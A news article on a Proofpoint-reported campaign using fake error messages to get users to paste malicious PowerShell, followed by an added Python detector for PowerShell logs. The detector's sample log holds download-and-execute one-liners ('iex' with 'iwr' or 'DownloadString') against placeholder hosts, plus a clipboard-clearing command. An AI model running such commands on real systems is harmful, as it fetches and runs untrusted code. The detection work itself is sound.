Threats, viruses and infections continue to spread, and a new attack campaign is putting users in trouble. What makes it so severe is that it imitates error messages from some of the best-known services and programs to trick you into running a process that infects your computer with malware.
As reported by Proofpoint, the company that raised the alarm about these threats, the campaign is spreading in several ways. That increases the risk, because the hackers behind the infection have looked for different routes to reach users and so put more of them in danger.
This is how the virus works
The only good news about this new malware campaign is that the process that puts users at risk does not seem very simple. From what we read, the infection chain is complex, and many users probably will not fall for it. Even so, Proofpoint says the lure is so realistic that, however complicated the steps are, plenty of people will end up falling into the trap.
The process begins when the user lands on one of the infected pages with Google Chrome, or finds the lure in a file opened with OneDrive or Word. A very convincing error message then appears on screen stating “Something has gone wrong displaying this page.” It claims that some kind of error has occurred and that, to fix it, the user must carry out the five steps detailed in the image below.
You can also copy the “solution” or refresh the page. As the image shared by the Proofpoint team shows, users are told to open Windows PowerShell with administrator permissions. There, a script is executed with various payloads prepared by the hackers to infect the user’s device. Among other things, it flushes the DNS cache, clears the clipboard, and runs an additional script that carries out the next stage of the infection.
Different versions and another threat
The specialists who reported this infection say there is not just one web message design within this campaign; they have found several versions. In general they all work the same way: trying to get the user to execute PowerShell code that leads to the computer being infected, with all the problems that follow.
They also note that the same malware is being deployed through emails with HTML attachments. When the user tries to open the file, an error message appears saying that a Word Online extension must be installed to view the document. At that point, the user ends up at the same destination: PowerShell, where they are told to copy and paste code that loads and executes the threat.
As the security experts who analyzed the problem explain, attackers are taking advantage of two different weaknesses. The first is that Windows has no detector to tell that the code copied to the clipboard is malicious; if one were implemented, it could help avoid many problems. The second lies with the user: the report stresses that many people are not aware of the risks that executing commands in PowerShell can entail. In this situation, it is better to keep your eyes wide open and avoid trouble.
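As an added example (not from the article or from Proofpoint's report), the following Python script shows the detection a defender can run against the chain described above and the clipboard gap noted in the last paragraph: it scores PowerShell script-block log entries for the combination of behaviours the article lists (flushing the DNS cache, clearing the clipboard, downloading and executing a follow-on script). The pipe-delimited log format, the indicator names and the threshold of three indicators are assumptions made for this example, and the sample log entries are constructed.

```python
"""Triage PowerShell script-block log entries for the copy-paste infection
chain the article describes (flush DNS cache, clear the clipboard, fetch and
run a follow-on script).  Added example: the log format and indicator names
are assumptions made for this demonstration, and the sample log is constructed."""
import re
from dataclasses import dataclass

# Indicator names are labels chosen for this example.  Each regex covers the
# usual PowerShell spellings of one behaviour mentioned in the article.
INDICATORS = [
    ("flush_dns", re.compile(r"ipconfig\s*/flushdns|Clear-DnsClientCache", re.I)),
    # Overwriting the clipboard with nothing hides the pasted command from the user.
    ("clear_clipboard", re.compile(r"Set-Clipboard\s+(-Value\s+)?('\s*'|\"\s*\"|\$null)", re.I)),
    ("download", re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|Net\.WebClient", re.I)),
    ("execute", re.compile(r"Invoke-Expression|\biex\b", re.I)),
]

# Any single indicator is ordinary admin activity (flushing DNS, or a vendor's
# download-and-run installer); the campaign is recognisable by the combination.
SUSPICIOUS_THRESHOLD = 3


@dataclass
class ScriptBlockEvent:
    record_id: int
    user: str
    text: str


def parse_log(text: str) -> list[ScriptBlockEvent]:
    """Parse a pipe-delimited export (assumed format for this example):
    event_id|record_id|user|script_block_text.  Only event 4104, the
    script-block logging event, is kept; the script text may itself contain '|'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event_id, record_id, user, script = line.split("|", 3)
        if event_id == "4104":
            events.append(ScriptBlockEvent(int(record_id), user, script))
    return events


def matched_indicators(script: str) -> list[str]:
    """Return the names of every indicator found in one script block, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(script)]


def is_suspicious(script: str) -> bool:
    return len(matched_indicators(script)) >= SUSPICIOUS_THRESHOLD


def triage(log_text: str) -> list[dict]:
    """Return one finding per script block that crosses the threshold."""
    findings = []
    for ev in parse_log(log_text):
        hits = matched_indicators(ev.text)
        if len(hits) >= SUSPICIOUS_THRESHOLD:
            findings.append({"record_id": ev.record_id, "user": ev.user, "indicators": hits})
    return findings


# Constructed sample log: a routine DNS flush, a vendor-style download-and-run
# installer, a block matching the chain the article describes, and an event of
# another type that is ignored.  The URLs are placeholders.
SAMPLE_LOG = """\
4104|1001|CORP\\alice|ipconfig /flushdns
4104|1002|CORP\\bob|iex ((New-Object Net.WebClient).DownloadString('https://example.invalid/install.ps1'))
4104|1003|CORP\\carol|ipconfig /flushdns; Set-Clipboard -Value ''; iex (iwr 'https://example.invalid/stage2.ps1' -UseBasicParsing)
4103|1004|CORP\\dave|Get-Process
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The threshold is deliberately above two: a bare DNS flush (record 1001) and a download-and-run installer (record 1002) are everyday administration and must not page anyone, while the third record carries all four behaviours and is reported. The clipboard-clearing indicator is the most specific of the four, since legitimate scripts rarely overwrite the clipboard with an empty value; it is also the step that removes the pasted command before the user can look at it, which is why it is worth keeping as its own signal. Script-block logging must be enabled for event 4104 to exist at all.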